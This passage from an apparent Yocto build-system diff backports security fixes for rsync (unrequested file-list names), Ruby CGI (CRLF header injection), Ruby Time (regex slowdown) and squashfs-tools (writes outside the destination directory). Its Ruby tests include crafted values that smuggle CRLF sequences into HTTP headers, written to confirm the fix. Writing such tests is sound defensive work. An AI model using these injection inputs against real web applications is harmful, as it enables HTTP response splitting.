++			}
++		}
++		*p = '\0';
++		rule->u.slash_cnt = slash_cnt;
++		arg = (const char *)rule->pattern;
++	}
++
++	if (recurse || xfer_dirs) {
++		/* Now create a rule with an added "/" & "**" or "*" at the end */
++		rule = new0(filter_rule);
++		if (recurse)
++			rule->rflags = FILTRULE_INCLUDE | FILTRULE_WILD | FILTRULE_WILD2;
++		else
++			rule->rflags = FILTRULE_INCLUDE | FILTRULE_WILD;
++		/* A +4 in the len leaves enough room for / * * \0 or / * \0 \0 */
++		if (!saw_wild && backslash_cnt) {
++			/* We are appending a wildcard, so now the backslashes need to be escaped. */
++			p = rule->pattern = new_array(char, arg_len + backslash_cnt + 3 + 1);
++			cp = arg;
++			while (*cp) {
++				if (*cp == '\\')
++					*p++ = '\\';
++				*p++ = *cp++;
++			}
++		} else {
++			p = rule->pattern = new_array(char, arg_len + 3 + 1);
++			if (arg_len) {
++				memcpy(p, arg, arg_len);
++				p += arg_len;
++			}
++		}
++		if (p[-1] != '/')
++			*p++ = '/';
++		*p++ = '*';
++		if (recurse)
++			*p++ = '*';
++		*p = '\0';
++		rule->u.slash_cnt = slash_cnt + 1;
++		rule->next = implied_filter_list.head;
++		implied_filter_list.head = rule;
++	}
++}
++
+ /* This frees any non-inherited items, leaving just inherited items on the list. */
+ static void pop_filter_list(filter_rule_list *listp)
+ {
+@@ -721,7 +845,7 @@ static void report_filter_result(enum logcode code, char const *name,
+ 			      : name_flags & NAME_IS_DIR ? "directory"
+ 			      : "file";
+ 		rprintf(code, "[%s] %sing %s %s because of pattern %s%s%s\n",
+-		    w, actions[*w!='s'][!(ent->rflags & FILTRULE_INCLUDE)],
++		    w, actions[*w=='g'][!(ent->rflags & FILTRULE_INCLUDE)],
+ 		    t, name, ent->pattern,
+ 		    ent->rflags & FILTRULE_DIRECTORY ? "/" : "", type);
+ 	}
+@@ -894,6 +1018,7 @@ static filter_rule *parse_rule_tok(const char **rulestr_ptr,
+ 		}
+ 		switch (ch) {
+ 		case ':':
++			trust_sender_filter = 1;
+ 			rule->rflags |= FILTRULE_PERDIR_MERGE
+ 				      | FILTRULE_FINISH_SETUP;
+ 			/* FALL THROUGH */
+diff --git a/flist.c b/flist.c
+index 499440c..630d685 100644
+--- a/flist.c
++++ b/flist.c
+@@ -70,6 +70,7 @@ extern int need_unsorted_flist;
+ extern int sender_symlink_iconv;
+ extern int output_needs_newline;
+ extern int sender_keeps_checksum;
++extern int trust_sender_filter;
+ extern int unsort_ndx;
+ extern uid_t our_uid;
+ extern struct stats stats;
+@@ -80,8 +81,7 @@ extern char curr_dir[MAXPATHLEN];
+ 
+ extern struct chmod_mode_struct *chmod_modes;
+ 
+-extern filter_rule_list filter_list;
+-extern filter_rule_list daemon_filter_list;
++extern filter_rule_list filter_list, implied_filter_list, daemon_filter_list;
+ 
+ #ifdef ICONV_OPTION
+ extern int filesfrom_convert;
+@@ -904,6 +904,19 @@ static struct file_struct *recv_file_entry(int f, struct file_list *flist, int x
+ 		exit_cleanup(RERR_UNSUPPORTED);
+ 	}
+ 
++	if (*thisname != '.' || thisname[1] != '\0') {
++		int filt_flags = S_ISDIR(mode) ? NAME_IS_DIR : NAME_IS_FILE;
++		if (!trust_sender_filter /* a per-dir filter rule means we must trust the sender's filtering */
++		 && filter_list.head && check_filter(&filter_list, FINFO, thisname, filt_flags) < 0) {
++			rprintf(FERROR, "ERROR: rejecting excluded file-list name: %s\n", thisname);
++			exit_cleanup(RERR_PROTOCOL);
++		}
++		if (implied_filter_list.head && check_filter(&implied_filter_list, FINFO, thisname, filt_flags) <= 0) {
++			rprintf(FERROR, "ERROR: rejecting unrequested file-list name: %s\n", thisname);
++			exit_cleanup(RERR_PROTOCOL);
++		}
++	}
++
+ 	if (inc_recurse && S_ISDIR(mode)) {
+ 		if (one_file_system) {
+ 			/* Room to save the dir's device for -x */
+diff --git a/io.c b/io.c
+index c04dbd5..698a7da 100644
+--- a/io.c
++++ b/io.c
+@@ -415,6 +415,7 @@ static void forward_filesfrom_data(void)
+ 		while (s != eob) {
+ 			if (*s++ == '\0') {
+ 				ff_xb.len = s - sob - 1;
++				add_implied_include(sob);
+ 				if (iconvbufs(ic_send, &ff_xb, &iobuf.out, flags) < 0)
+ 					exit_cleanup(RERR_PROTOCOL); /* impossible? */
+ 				write_buf(iobuf.out_fd, s-1, 1); /* Send the '\0'. */
+@@ -446,9 +447,12 @@ static void forward_filesfrom_data(void)
+ 		char *f = ff_xb.buf + ff_xb.pos;
+ 		char *t = ff_xb.buf;
+ 		char *eob = f + len;
++		char *cur = t;
+ 		/* Eliminate any multi-'\0' runs. */
+ 		while (f != eob) {
+ 			if (!(*t++ = *f++)) {
++				add_implied_include(cur);
++				cur = t;
+ 				while (f != eob && *f == '\0')
+ 					f++;
+ 			}
+diff --git a/main.c b/main.c
+index ee9630f..6ec56e7 100644
+--- a/main.c
++++ b/main.c
+@@ -78,6 +78,7 @@ extern BOOL flist_receiving_enabled;
+ extern BOOL shutting_down;
+ extern int backup_dir_len;
+ extern int basis_dir_cnt;
++extern int trust_sender_filter;
+ extern struct stats stats;
+ extern char *stdout_format;
+ extern char *logfile_format;
+@@ -93,7 +94,7 @@ extern char curr_dir[MAXPATHLEN];
+ extern char backup_dir_buf[MAXPATHLEN];
+ extern char *basis_dir[MAX_BASIS_DIRS+1];
+ extern struct file_list *first_flist;
+-extern filter_rule_list daemon_filter_list;
++extern filter_rule_list daemon_filter_list, implied_filter_list;
+ 
+ uid_t our_uid;
+ gid_t our_gid;
+@@ -534,6 +535,7 @@ static pid_t do_cmd(char *cmd, char *machine, char *user, char **remote_argv, in
+ #ifdef ICONV_CONST
+ 		setup_iconv();
+ #endif
++		trust_sender_filter = 1;
+ 	} else if (local_server) {
+ 		/* If the user didn't request --[no-]whole-file, force
+ 		 * it on, but only if we're not batch processing. */
+@@ -1358,6 +1360,8 @@ static int start_client(int argc, char *argv[])
+ 		char *dummy_host;
+ 		int dummy_port = rsync_port;
+ 		int i;
++		if (filesfrom_fd < 0)
++			add_implied_include(remote_argv[0]);
+ 		/* For remote source, any extra source args must have either
+ 		 * the same hostname or an empty hostname. */
+ 		for (i = 1; i < remote_argc; i++) {
+@@ -1381,6 +1385,7 @@ static int start_client(int argc, char *argv[])
+ 			if (!rsync_port && !*arg) /* Turn an empty arg into a dot dir. */
+ 				arg = ".";
+ 			remote_argv[i] = arg;
++			add_implied_include(arg);
+ 		}
+ 	}
+ 
+diff --git a/receiver.c b/receiver.c
+index d6a48f1..c0aa893 100644
+--- a/receiver.c
++++ b/receiver.c
+@@ -577,10 +577,13 @@ int recv_files(int f_in, int f_out, char *local_name)
+ 		if (DEBUG_GTE(RECV, 1))
+ 			rprintf(FINFO, "recv_files(%s)\n", fname);
+ 
+-		if (daemon_filter_list.head && (*fname != '.' || fname[1] != '\0')
+-		 && check_filter(&daemon_filter_list, FLOG, fname, 0) < 0) {
+-			rprintf(FERROR, "attempt to hack rsync failed.\n");
+-			exit_cleanup(RERR_PROTOCOL);
++		if (daemon_filter_list.head && (*fname != '.' || fname[1] != '\0')) {
++			int filt_flags = S_ISDIR(file->mode) ? NAME_IS_DIR : NAME_IS_FILE;
++			if (check_filter(&daemon_filter_list, FLOG, fname, filt_flags) < 0) {
++				rprintf(FERROR, "ERROR: rejecting file transfer request for daemon excluded file: %s\n",
++					fname);
++				exit_cleanup(RERR_PROTOCOL);
++			}
+ 		}
+ 
+ #ifdef SUPPORT_XATTRS
+-- 
+2.30.2
+
diff --git a/meta/recipes-devtools/rsync/rsync_3.1.3.bb b/meta/recipes-devtools/rsync/rsync_3.1.3.bb
index 152ff02a25..c744503227 100644
--- a/meta/recipes-devtools/rsync/rsync_3.1.3.bb
+++ b/meta/recipes-devtools/rsync/rsync_3.1.3.bb
@@ -1,5 +1,6 @@
 SUMMARY = "File synchronization tool"
 HOMEPAGE = "http://rsync.samba.org/"
+DESCRIPTION = "rsync is an open source utility that provides fast incremental file transfer."
 BUGTRACKER = "http://rsync.samba.org/bugzilla.html"
 SECTION = "console/network"
 # GPLv2+ (<< 3.0.0), GPLv3+ (>= 3.0.0)
@@ -15,6 +16,8 @@ SRC_URI = "https://download.samba.org/pub/${BPN}/src/${BP}.tar.gz \
            file://CVE-2016-9841.patch \
            file://CVE-2016-9842.patch \
            file://CVE-2016-9843.patch \
+           file://CVE-2022-29154.patch \
+           file://0001-Fix-relative-when-copying-an-absolute-path.patch \
 "
 
 SRC_URI[md5sum] = "1581a588fde9d89f6bc6201e8129afaf"
diff --git a/meta/recipes-devtools/ruby/ruby.inc b/meta/recipes-devtools/ruby/ruby.inc
index a38b3fe624..a9f4240932 100644
--- a/meta/recipes-devtools/ruby/ruby.inc
+++ b/meta/recipes-devtools/ruby/ruby.inc
@@ -14,8 +14,8 @@ LIC_FILES_CHKSUM = "\
     file://LEGAL;md5=2b6d62dc0d608f34d510ca3f428110ec \
 "
 
-DEPENDS = "ruby-native zlib openssl tcl libyaml gdbm readline libffi"
-DEPENDS_class-native = "openssl-native libyaml-native readline-native zlib-native"
+DEPENDS = "zlib openssl libyaml gdbm readline libffi"
+DEPENDS_append_class-target = " ruby-native"
 
 SHRT_VER = "${@oe.utils.trim_version("${PV}", 2)}"
 SRC_URI = "http://cache.ruby-lang.org/pub/ruby/${SHRT_VER}/ruby-${PV}.tar.gz \
diff --git a/meta/recipes-devtools/ruby/ruby/0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch b/meta/recipes-devtools/ruby/ruby/0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch
new file mode 100644
index 0000000000..826daf2cda
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch
@@ -0,0 +1,32 @@
+From 2368d07660a93a2c41d63f3ab6054ca4daeef820 Mon Sep 17 00:00:00 2001
+From: Alexander Kanavin <alex.kanavin@gmail.com>
+Date: Tue, 17 Nov 2020 18:31:40 +0000
+Subject: [PATCH] template/Makefile.in: do not write host cross-cc items into
+ target config
+
+This helps reproducibility.
+
+Upstream-Status: Inapproppriate [oe-core specific]
+Signed-off-by: Alexander Kanavin <alex.kanavin@gmail.com>
+---
+ template/Makefile.in | 4 ++--
+ 1 file changed, 2 insertions(+), 2 deletions(-)
+
+diff --git a/template/Makefile.in b/template/Makefile.in
+index 10dc826..940ee07 100644
+--- a/template/Makefile.in
++++ b/template/Makefile.in
+@@ -657,11 +657,11 @@ mjit_config.h:
+ 	echo '#endif'; \
+ 	quote MJIT_MIN_HEADER_NAME "$(MJIT_MIN_HEADER_NAME)"; \
+ 	sep=,; \
+-	quote "MJIT_CC_COMMON  " $(MJIT_CC); \
++	quote "MJIT_CC_COMMON  " ; \
+ 	quote "MJIT_CFLAGS      MJIT_ARCHFLAG" $(MJIT_CFLAGS); \
+ 	quote "MJIT_OPTFLAGS   " $(MJIT_OPTFLAGS); \
+ 	quote "MJIT_DEBUGFLAGS " $(MJIT_DEBUGFLAGS); \
+-	quote "MJIT_LDSHARED   " $(MJIT_LDSHARED); \
++	quote "MJIT_LDSHARED   " ; \
+ 	quote "MJIT_DLDFLAGS    MJIT_ARCHFLAG" $(MJIT_DLDFLAGS); \
+ 	quote "MJIT_LIBS       " $(LIBRUBYARG_SHARED); \
+ 	quote 'PRELOADENV       "@PRELOADENV@"'; \
diff --git a/meta/recipes-devtools/ruby/ruby/CVE-2020-25613.patch b/meta/recipes-devtools/ruby/ruby/CVE-2020-25613.patch
deleted file mode 100644
index 1abcb7547e..0000000000
--- a/meta/recipes-devtools/ruby/ruby/CVE-2020-25613.patch
+++ /dev/null
@@ -1,40 +0,0 @@
-From 8946bb38b4d87549f0d99ed73c62c41933f97cc7 Mon Sep 17 00:00:00 2001
-From: Yusuke Endoh <mame@ruby-lang.org>
-Date: Tue, 29 Sep 2020 13:15:58 +0900
-Subject: [PATCH] Make it more strict to interpret some headers
-
-Some regexps were too tolerant.
-
-Upstream-Status: Backport
-[https://github.com/ruby/webrick/commit/8946bb38b4d87549f0d99ed73c62c41933f97cc7]
-CVE: CVE-2020-25613
-Signed-off-by: Chee Yang Lee <chee.yang.lee@intel.com>
----
- lib/webrick/httprequest.rb | 6 +++---
- 1 file changed, 3 insertions(+), 3 deletions(-)
-
-diff --git a/lib/webrick/httprequest.rb b/lib/webrick/httprequest.rb
-index 294bd91..d34eac7 100644
---- a/lib/webrick/httprequest.rb
-+++ b/lib/webrick/httprequest.rb
-@@ -227,9 +227,9 @@ def parse(socket=nil)
-         raise HTTPStatus::BadRequest, "bad URI `#{@unparsed_uri}'."
-       end
- 
--      if /close/io =~ self["connection"]
-+      if /\Aclose\z/io =~ self["connection"]
-         @keep_alive = false
--      elsif /keep-alive/io =~ self["connection"]
-+      elsif /\Akeep-alive\z/io =~ self["connection"]
-         @keep_alive = true
-       elsif @http_version < "1.1"
-         @keep_alive = false
-@@ -508,7 +508,7 @@ def read_body(socket, block)
-       return unless socket
-       if tc = self['transfer-encoding']
-         case tc
--        when /chunked/io then read_chunked(socket, block)
-+        when /\Achunked\z/io then read_chunked(socket, block)
-         else raise HTTPStatus::NotImplemented, "Transfer-Encoding: #{tc}."
-         end
-       elsif self['content-length'] || @remaining_size
diff --git a/meta/recipes-devtools/ruby/ruby/CVE-2021-33621.patch b/meta/recipes-devtools/ruby/ruby/CVE-2021-33621.patch
new file mode 100644
index 0000000000..cc2f9853db
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/CVE-2021-33621.patch
@@ -0,0 +1,139 @@
+From 64c5045c0a6b84fdb938a8465a0890e5f7162708 Mon Sep 17 00:00:00 2001
+From: Yusuke Endoh <mame@ruby-lang.org>
+Date: Tue, 22 Nov 2022 10:49:27 +0900
+Subject: [PATCH] Prevent CRLF injection
+
+Throw a RuntimeError if the HTTP response header contains CR or LF to
+prevent HTTP response splitting.
+
+https://hackerone.com/reports/1204695
+
+Upstream-Status: Backport [https://github.com/ruby/cgi/commit/64c5045c0a6b84fdb938a8465a0890e5f7162708]
+CVE: CVE-2021-33621
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/cgi/core.rb             | 45 +++++++++++++++++++++++--------------
+ test/cgi/test_cgi_header.rb |  8 +++++++
+ 2 files changed, 36 insertions(+), 17 deletions(-)
+
+diff --git a/lib/cgi/core.rb b/lib/cgi/core.rb
+index bec76e0..62e6068 100644
+--- a/lib/cgi/core.rb
++++ b/lib/cgi/core.rb
+@@ -188,17 +188,28 @@ class CGI
+   # Using #header with the HTML5 tag maker will create a <header> element.
+   alias :header :http_header
+ 
++  def _no_crlf_check(str)
++    if str
++      str = str.to_s
++      raise "A HTTP status or header field must not include CR and LF" if str =~ /[\r\n]/
++      str
++    else
++      nil
++    end
++  end
++  private :_no_crlf_check
++
+   def _header_for_string(content_type) #:nodoc:
+     buf = ''.dup
+     if nph?()
+-      buf << "#{$CGI_ENV['SERVER_PROTOCOL'] || 'HTTP/1.0'} 200 OK#{EOL}"
++      buf << "#{_no_crlf_check($CGI_ENV['SERVER_PROTOCOL']) || 'HTTP/1.0'} 200 OK#{EOL}"
+       buf << "Date: #{CGI.rfc1123_date(Time.now)}#{EOL}"
+-      buf << "Server: #{$CGI_ENV['SERVER_SOFTWARE']}#{EOL}"
++      buf << "Server: #{_no_crlf_check($CGI_ENV['SERVER_SOFTWARE'])}#{EOL}"
+       buf << "Connection: close#{EOL}"
+     end
+-    buf << "Content-Type: #{content_type}#{EOL}"
++    buf << "Content-Type: #{_no_crlf_check(content_type)}#{EOL}"
+     if @output_cookies
+-      @output_cookies.each {|cookie| buf << "Set-Cookie: #{cookie}#{EOL}" }
++      @output_cookies.each {|cookie| buf << "Set-Cookie: #{_no_crlf_check(cookie)}#{EOL}" }
+     end
+     return buf
+   end # _header_for_string
+@@ -213,9 +224,9 @@ class CGI
+     ## NPH
+     options.delete('nph') if defined?(MOD_RUBY)
+     if options.delete('nph') || nph?()
+-      protocol = $CGI_ENV['SERVER_PROTOCOL'] || 'HTTP/1.0'
++      protocol = _no_crlf_check($CGI_ENV['SERVER_PROTOCOL']) || 'HTTP/1.0'
+       status = options.delete('status')
+-      status = HTTP_STATUS[status] || status || '200 OK'
++      status = HTTP_STATUS[status] || _no_crlf_check(status) || '200 OK'
+       buf << "#{protocol} #{status}#{EOL}"
+       buf << "Date: #{CGI.rfc1123_date(Time.now)}#{EOL}"
+       options['server'] ||= $CGI_ENV['SERVER_SOFTWARE'] || ''
+@@ -223,38 +234,38 @@ class CGI
+     end
+     ## common headers
+     status = options.delete('status')
+-    buf << "Status: #{HTTP_STATUS[status] || status}#{EOL}" if status
++    buf << "Status: #{HTTP_STATUS[status] || _no_crlf_check(status)}#{EOL}" if status
+     server = options.delete('server')
+-    buf << "Server: #{server}#{EOL}" if server
++    buf << "Server: #{_no_crlf_check(server)}#{EOL}" if server
+     connection = options.delete('connection')
+-    buf << "Connection: #{connection}#{EOL}" if connection
++    buf << "Connection: #{_no_crlf_check(connection)}#{EOL}" if connection
+     type = options.delete('type')
+-    buf << "Content-Type: #{type}#{EOL}" #if type
++    buf << "Content-Type: #{_no_crlf_check(type)}#{EOL}" #if type
+     length = options.delete('length')
+-    buf << "Content-Length: #{length}#{EOL}" if length
++    buf << "Content-Length: #{_no_crlf_check(length)}#{EOL}" if length
+     language = options.delete('language')
+-    buf << "Content-Language: #{language}#{EOL}" if language
++    buf << "Content-Language: #{_no_crlf_check(language)}#{EOL}" if language
+     expires = options.delete('expires')
+     buf << "Expires: #{CGI.rfc1123_date(expires)}#{EOL}" if expires
+     ## cookie
+     if cookie = options.delete('cookie')
+       case cookie
+       when String, Cookie
+-        buf << "Set-Cookie: #{cookie}#{EOL}"
++        buf << "Set-Cookie: #{_no_crlf_check(cookie)}#{EOL}"
+       when Array
+         arr = cookie
+-        arr.each {|c| buf << "Set-Cookie: #{c}#{EOL}" }
++        arr.each {|c| buf << "Set-Cookie: #{_no_crlf_check(c)}#{EOL}" }
+       when Hash
+         hash = cookie
+-        hash.each_value {|c| buf << "Set-Cookie: #{c}#{EOL}" }
++        hash.each_value {|c| buf << "Set-Cookie: #{_no_crlf_check(c)}#{EOL}" }
+       end
+     end
+     if @output_cookies
+-      @output_cookies.each {|c| buf << "Set-Cookie: #{c}#{EOL}" }
++      @output_cookies.each {|c| buf << "Set-Cookie: #{_no_crlf_check(c)}#{EOL}" }
+     end
+     ## other headers
+     options.each do |key, value|
+-      buf << "#{key}: #{value}#{EOL}"
++      buf << "#{_no_crlf_check(key)}: #{_no_crlf_check(value)}#{EOL}"
+     end
+     return buf
+   end # _header_for_hash
+diff --git a/test/cgi/test_cgi_header.rb b/test/cgi/test_cgi_header.rb
+index bab2d03..ec2f4de 100644
+--- a/test/cgi/test_cgi_header.rb
++++ b/test/cgi/test_cgi_header.rb
+@@ -176,6 +176,14 @@ class CGIHeaderTest < Test::Unit::TestCase
+   end
+ 
+ 
++  def test_cgi_http_header_crlf_injection
++    cgi = CGI.new
++    assert_raise(RuntimeError) { cgi.http_header("text/xhtml\r\nBOO") }
++    assert_raise(RuntimeError) { cgi.http_header("type" => "text/xhtml\r\nBOO") }
++    assert_raise(RuntimeError) { cgi.http_header("status" => "200 OK\r\nBOO") }
++    assert_raise(RuntimeError) { cgi.http_header("location" => "text/xhtml\r\nBOO") }
++  end
++
+ 
+   instance_methods.each do |method|
+     private method if method =~ /^test_(.*)/ && $1 != ENV['TEST']
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/ruby/ruby/CVE-2023-28756.patch b/meta/recipes-devtools/ruby/ruby/CVE-2023-28756.patch
new file mode 100644
index 0000000000..c25a147d36
--- /dev/null
+++ b/meta/recipes-devtools/ruby/ruby/CVE-2023-28756.patch
@@ -0,0 +1,61 @@
+From 957bb7cb81995f26c671afce0ee50a5c660e540e Mon Sep 17 00:00:00 2001
+From: Hiroshi SHIBATA <hsbt@ruby-lang.org>
+Date: Wed, 29 Mar 2023 13:28:25 +0900
+Subject: [PATCH] CVE-2023-28756
+
+CVE: CVE-2023-28756
+Upstream-Status: Backport [https://github.com/ruby/ruby/commit/957bb7cb81995f26c671afce0ee50a5c660e540e]
+
+Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com>
+---
+ lib/time.rb       | 6 +++---
+ test/test_time.rb | 9 +++++++++
+ 2 files changed, 12 insertions(+), 3 deletions(-)
+
+diff --git a/lib/time.rb b/lib/time.rb
+index f27bacd..4a86e8e 100644
+--- a/lib/time.rb
++++ b/lib/time.rb
+@@ -501,8 +501,8 @@ class Time
+           (Jan|Feb|Mar|Apr|May|Jun|Jul|Aug|Sep|Oct|Nov|Dec)\s+
+           (\d{2,})\s+
+           (\d{2})\s*
+-          :\s*(\d{2})\s*
+-          (?::\s*(\d{2}))?\s+
++          :\s*(\d{2})
++          (?:\s*:\s*(\d\d))?\s+
+           ([+-]\d{4}|
+            UT|GMT|EST|EDT|CST|CDT|MST|MDT|PST|PDT|[A-IK-Z])/ix =~ date
+         # Since RFC 2822 permit comments, the regexp has no right anchor.
+@@ -717,7 +717,7 @@ class Time
+   #
+   # If self is a UTC time, Z is used as TZD.  [+-]hh:mm is used otherwise.
+   #
+-  # +fractional_digits+ specifies a number of digits to use for fractional
++  # +fraction_digits+ specifies a number of digits to use for fractional
+   # seconds.  Its default value is 0.
+   #
+   #     require 'time'
+diff --git a/test/test_time.rb b/test/test_time.rb
+index ca20788..4f11048 100644
+--- a/test/test_time.rb
++++ b/test/test_time.rb
+@@ -62,6 +62,15 @@ class TestTimeExtension < Test::Unit::TestCase # :nodoc:
+     assert_equal(true, t.utc?)
+   end
+ 
++  def test_rfc2822_nonlinear
++    pre = ->(n) {"0 Feb 00 00 :00" + " " * n}
++    assert_linear_performance([100, 500, 5000, 50_000], pre: pre) do |s|
++      assert_raise(ArgumentError) do
++        Time.rfc2822(s)
++      end
++    end
++  end
++
+   def test_encode_rfc2822
+     t = Time.utc(1)
+     assert_equal("Mon, 01 Jan 0001 00:00:00 -0000", t.rfc2822)
+-- 
+2.25.1
+
diff --git a/meta/recipes-devtools/ruby/ruby_2.7.1.bb b/meta/recipes-devtools/ruby/ruby_2.7.6.bb
index f87686f6f7..7e6373bd24 100644
--- a/meta/recipes-devtools/ruby/ruby_2.7.1.bb
+++ b/meta/recipes-devtools/ruby/ruby_2.7.6.bb
@@ -6,11 +6,17 @@ SRC_URI += " \
            file://remove_has_include_macros.patch \
            file://run-ptest \
            file://0001-Modify-shebang-of-libexec-y2racc-and-libexec-racc2y.patch \
-           file://CVE-2020-25613.patch \
+           file://0001-template-Makefile.in-do-not-write-host-cross-cc-item.patch \
+           file://CVE-2023-28756.patch \
+           file://CVE-2021-33621.patch \
            "
 
-SRC_URI[md5sum] = "debb9c325bf65021214451660f46e909"
-SRC_URI[sha256sum] = "d418483bdd0000576c1370571121a6eb24582116db0b7bb2005e90e250eae418"
+SRC_URI[md5sum] = "f972fb0cce662966bec10d5c5f32d042"
+SRC_URI[sha256sum] = "e7203b0cc09442ed2c08936d483f8ac140ec1c72e37bb5c401646b7866cb5d10"
+
+# CVE-2021-28966 is Windows specific and not affects Linux OS
+# https://security-tracker.debian.org/tracker/CVE-2021-28966
+CVE_CHECK_WHITELIST += "CVE-2021-28966"
 
 PACKAGECONFIG ??= ""
 PACKAGECONFIG += "${@bb.utils.filter('DISTRO_FEATURES', 'ipv6', d)}"
diff --git a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts
index f84a7e18c8..95dccb9cae 100755
--- a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts
+++ b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts
@@ -72,12 +72,12 @@ exec_postinst_scriptlets() {
 		else
 			echo "ERROR: postinst $i failed."
 			[ "$POSTINST_LOGGING" = "1" ] && eval echo "ERROR: postinst $i failed." $append_log
-			remove_pi_dir=0
+			remove_rcsd_link=0
 		fi
 	done
 }
 
-remove_pi_dir=1
+remove_rcsd_link=1
 if $pm_installed; then
 	case $pm in
 		"ipk")
@@ -92,9 +92,7 @@ else
 	exec_postinst_scriptlets
 fi
 
-# since all postinstalls executed successfully, remove the postinstalls directory
-# and the rcS.d link
-if [ $remove_pi_dir = 1 ]; then
-	rm -rf $pi_dir
+# since all postinstalls executed successfully, remove the rcS.d link
+if [ $remove_rcsd_link = 1 ]; then
 	remove_rcsd_link
 fi
diff --git a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service
index 7f72f3388a..b6b81d5c1a 100644
--- a/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service
+++ b/meta/recipes-devtools/run-postinsts/run-postinsts/run-postinsts.service
@@ -1,7 +1,7 @@
 [Unit]
 Description=Run pending postinsts
 DefaultDependencies=no
-After=systemd-remount-fs.service systemd-tmpfiles-setup.service tmp.mount
+After=systemd-remount-fs.service systemd-tmpfiles-setup.service tmp.mount ldconfig.service
 Before=sysinit.target
 
 [Service]
diff --git a/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb b/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb
index 85b3fc867e..c353d4b79c 100644
--- a/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb
+++ b/meta/recipes-devtools/run-postinsts/run-postinsts_1.0.bb
@@ -1,4 +1,5 @@
 SUMMARY = "Runs postinstall scripts on first boot of the target device"
+DESCRIPTION = "${SUMMARY}"
 SECTION = "devel"
 PR = "r10"
 LICENSE = "MIT"
diff --git a/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch
new file mode 100644
index 0000000000..95e2534ee4
--- /dev/null
+++ b/meta/recipes-devtools/squashfs-tools/files/CVE-2021-40153.patch
@@ -0,0 +1,253 @@
+Backport patch to fix CVE-2021-40153, and remove version update in unsquashfs.c
+for compatible.
+
+Upstream-Status: Backport [https://github.com/plougher/squashfs-tools/commit/79b5a55]
+CVE: CVE-2021-40153
+
+Signed-off-by: Kai Kang <kai.kang@windriver.com>
+
+From 79b5a555058eef4e1e7ff220c344d39f8cd09646 Mon Sep 17 00:00:00 2001
+From: Phillip Lougher <phillip@squashfs.org.uk>
+Date: Sat, 16 Jan 2021 20:08:55 +0000
+Subject: [PATCH] Unsquashfs: fix write outside destination directory exploit
+
+An issue on Github (https://github.com/plougher/squashfs-tools/issues/72)
+shows how some specially crafted Squashfs filesystems containing
+invalid file names (with '/' and ..) can cause Unsquashfs to write
+files outside of the destination directory.
+
+This commit fixes this exploit by checking all names for
+validity.
+
+In doing so I have also added checks for '.' and for names that
+are shorter than they should be (names in the file system should
+not have '\0' terminators).
+
+Signed-off-by: Phillip Lougher <phillip@squashfs.org.uk>
+---
+ squashfs-tools/Makefile        |  5 ++-
+ squashfs-tools/unsquash-1.c    |  9 +++++-
+ squashfs-tools/unsquash-1234.c | 58 ++++++++++++++++++++++++++++++++++
+ squashfs-tools/unsquash-2.c    |  9 +++++-
+ squashfs-tools/unsquash-3.c    |  9 +++++-
+ squashfs-tools/unsquash-4.c    |  9 +++++-
+ squashfs-tools/unsquashfs.h    |  5 ++-
+ 7 files changed, 98 insertions(+), 6 deletions(-)
+ create mode 100644 squashfs-tools/unsquash-1234.c
+
+diff --git a/squashfs-tools/Makefile b/squashfs-tools/Makefile
+index aee4b960..20feaca2 100644
+--- a/squashfs-tools/Makefile
++++ b/squashfs-tools/Makefile
+@@ -156,7 +156,8 @@ MKSQUASHFS_OBJS = mksquashfs.o read_fs.o action.o swap.o pseudo.o compressor.o \
+ 	caches-queues-lists.o
+ 
+ UNSQUASHFS_OBJS = unsquashfs.o unsquash-1.o unsquash-2.o unsquash-3.o \
+-	unsquash-4.o unsquash-123.o unsquash-34.o swap.o compressor.o unsquashfs_info.o
++	unsquash-4.o unsquash-123.o unsquash-34.o unsquash-1234.o swap.o \
++	compressor.o unsquashfs_info.o
+ 
+ CFLAGS ?= -O2
+ CFLAGS += $(EXTRA_CFLAGS) $(INCLUDEDIR) -D_FILE_OFFSET_BITS=64 \
+@@ -350,6 +351,8 @@ unsquash-123.o: unsquashfs.h unsquash-123.c squashfs_fs.h squashfs_compat.h
+ 
+ unsquash-34.o: unsquashfs.h unsquash-34.c
+ 
++unsquash-1234.o: unsquash-1234.c
++
+ unsquashfs_xattr.o: unsquashfs_xattr.c unsquashfs.h squashfs_fs.h xattr.h
+ 
+ unsquashfs_info.o: unsquashfs.h squashfs_fs.h
+diff --git a/squashfs-tools/unsquash-1.c b/squashfs-tools/unsquash-1.c
+index 34eced36..28326cb1 100644
+--- a/squashfs-tools/unsquash-1.c
++++ b/squashfs-tools/unsquash-1.c
+@@ -2,7 +2,7 @@
+  * Unsquash a squashfs filesystem.  This is a highly compressed read only
+  * filesystem.
+  *
+- * Copyright (c) 2009, 2010, 2011, 2012, 2019
++ * Copyright (c) 2009, 2010, 2011, 2012, 2019, 2021
+  * Phillip Lougher <phillip@squashfs.org.uk>
+  *
+  * This program is free software; you can redistribute it and/or
+@@ -285,6 +285,13 @@ static struct dir *squashfs_opendir(unsigned int block_start, unsigned int offse
+ 			memcpy(dire->name, directory_table + bytes,
+ 				dire->size + 1);
+ 			dire->name[dire->size + 1] = '\0';
++
++			/* check name for invalid characters (i.e /, ., ..) */
++			if(check_name(dire->name, dire->size + 1) == FALSE) {
++				ERROR("File system corrupted: invalid characters in name\n");
++				goto corrupted;
++			}
++
+ 			TRACE("squashfs_opendir: directory entry %s, inode "
+ 				"%d:%d, type %d\n", dire->name,
+ 				dirh.start_block, dire->offset, dire->type);
